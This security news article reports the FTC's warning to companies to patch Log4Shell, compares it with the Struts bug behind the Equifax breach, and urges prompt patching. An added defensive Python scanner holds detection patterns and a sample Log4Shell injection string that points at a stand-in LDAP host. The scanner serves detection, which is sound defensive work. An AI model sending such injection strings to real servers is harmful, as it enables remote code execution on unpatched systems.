The Federal Trade Commission (FTC), the consumer rights agency of the United States, is entering 2022 with a bang rather than a whimper.
Using the infamous Log4Shell vulnerability as what you might call Exhibit A, the FTC has fired a shot across the bow of companies under US jurisdiction, telling them to fix it, or else face the consequences:
It is critical that companies and their vendors relying on Log4j act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action.
Of course, it isn't only Log4j that creates a legal obligation to do the right thing by consumers. As the FTC reminds us all:
When vulnerabilities are discovered and exploited, it risks a loss or breach of personal information, financial loss, and other irreversible harms. The duty to take reasonable steps to mitigate known software vulnerabilities implicates laws including the Federal Trade Commission Act and the Gramm-Leach-Bliley Act.
In other words, the fact that your company may itself be the victim of a crime does not free you from civil or even criminal liability.
Simply put: if there were reasonable precautions against a data breach that you could have taken, and that people would reasonably have expected you to take, but you didn't…
…then you may end up being both the victim and the perpetrator at the same time.
The FTC has done this before
The FTC's short and direct warning cites the infamous Equifax breach of 2017, when the US credit-reporting giant was compromised via an unpatched Apache Struts vulnerability with the humble-looking bug identifier CVE-2017-5638.
The personal information of nearly 150 million people was exposed as a result.
The FTC pointedly reminds us that Equifax ended up paying $700 million to settle the subsequent legal action brought by the FTC itself, the US Consumer Financial Protection Bureau, and all 50 US states.
The FTC also made it clear that it will be perfectly happy to bring charges against future offenders:
The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.
Seen it all before
Interestingly, Equifax's Apache Struts vulnerability has a lot in common with the Log4Shell hole in Apache's Log4j logging code.
The CVE-2017-5638 Struts bug was exploitable because innocuous-looking text data in an untrusted web request could contain a "magic character sequence" that was treated as a mini-program at the other end.
Instead of saying "The data I just sent you is in this format: text/plain", you could say something like "The data I just sent you is in this format: (hey, run this completely untrusted short text string as a program fragment to find out what type it is)".
Like Log4j's Log4Shell bug, this was originally designed as a feature, giving your back-end business logic programmers extra flexibility, while inadvertently handing cybercriminals an exploitable remote code execution hole.
The official name of the Log4j bug is CVE-2021-44228, but it's generally known as Log4Shell, and if anything it was even worse.
The logging toolkit mistakenly allowed crooks not only to say "The data I want you to log is: this text here", but also to embed logging instructions such as "The data I want you to log is: (hey, here's a website where you can fetch a program that might tell you what to log, so please download it yourself and run it for me)".
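The common thread in both bugs above is untrusted text being treated as instructions. The following is an added example, not code from the original article or from the Log4j project: a defender-side check, written in Python, that flags request fields carrying Log4j-style "${...}" lookup syntax before they reach a logging call, and neutralises them. The header names, the sample requests and the "$[" replacement are all constructed for illustration; the real remedy for CVE-2021-44228 is to patch Log4j, and this check is only a compensating control and a detection aid.

```python
"""
Added example (not from the original article or the Log4j project): a
defender-side check that flags untrusted request data carrying Log4j-style
"${...}" lookup syntax before it reaches a logging call, and neutralises it.

Assumptions (hypothetical): each request is a dict of header name -> value.
The sample requests below are constructed and use reserved example domains.
"""
import re
from typing import Dict, List

# Log4j 2 lookups begin with "${".  The Log4Shell lookup of interest starts
# with "jndi:"; any other lookup in untrusted input is still worth flagging,
# since the general problem is "data that behaves like a program".
LOOKUP_RE = re.compile(r"\$\{")
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def classify(value: str) -> str:
    """Return 'jndi', 'lookup' or 'clean' for one untrusted string."""
    if JNDI_RE.search(value):
        return "jndi"
    if LOOKUP_RE.search(value):
        return "lookup"
    return "clean"


def neutralise(value: str) -> str:
    """Break the lookup opener so a downstream logger sees plain text.

    Replacing "${" with "$[" is an assumed, illustrative choice: it keeps
    the original text recognisable in the log while removing the syntax
    that a vulnerable Log4j would interpret.
    """
    return LOOKUP_RE.sub("$[", value)


def scan_request(headers: Dict[str, str]) -> List[dict]:
    """Return one finding per header whose value contains lookup syntax."""
    findings = []
    for name, value in headers.items():
        verdict = classify(value)
        if verdict != "clean":
            findings.append(
                {"header": name, "verdict": verdict, "safe_value": neutralise(value)}
            )
    return findings


def summarise(requests: List[Dict[str, str]]) -> Dict[str, int]:
    """Count requests by their worst verdict (jndi > lookup > clean)."""
    counts = {"jndi": 0, "lookup": 0, "clean": 0}
    for headers in requests:
        findings = scan_request(headers)
        if not findings:
            counts["clean"] += 1
        elif any(f["verdict"] == "jndi" for f in findings):
            counts["jndi"] += 1
        else:
            counts["lookup"] += 1
    return counts


# Constructed sample requests (not real traffic).
SAMPLE_REQUESTS = [
    {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)", "X-Forwarded-For": "203.0.113.7"},
    {"User-Agent": "${JNDI:ldap://lookup.example/x}", "X-Forwarded-For": "198.51.100.9"},
    {"User-Agent": "curl/7.79.1", "X-Api-Version": "${env:HOME}"},
]

if __name__ == "__main__":
    for headers in SAMPLE_REQUESTS:
        for finding in scan_request(headers):
            print(finding)
    print(summarise(SAMPLE_REQUESTS))
```

Run as a script it prints one finding per suspicious header and a summary of the three constructed requests; in practice you would call scan_request() in the request pipeline, log the finding with the neutralised value, and alert on any "jndi" verdict.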
What to do?
If you're still stuck with a 1999-style patching policy, one where you sit on the sidelines and watch carefully while better-prepared companies go first, and then wait several days (or weeks, or months) while your change control board weighs up the pros and cons…
…you may need to get your change control board to approve a change to the change control board itself.
The FTC is essentially warning companies and their suppliers that some vulnerabilities and patches are too important to leave any room for delay. Lead, follow, or get out of the way: except that here, the only room is at the front.
As Naked Security itself has often said: Patch early, patch often…
…your customers (and the regulators in your country or region) will respect you for it!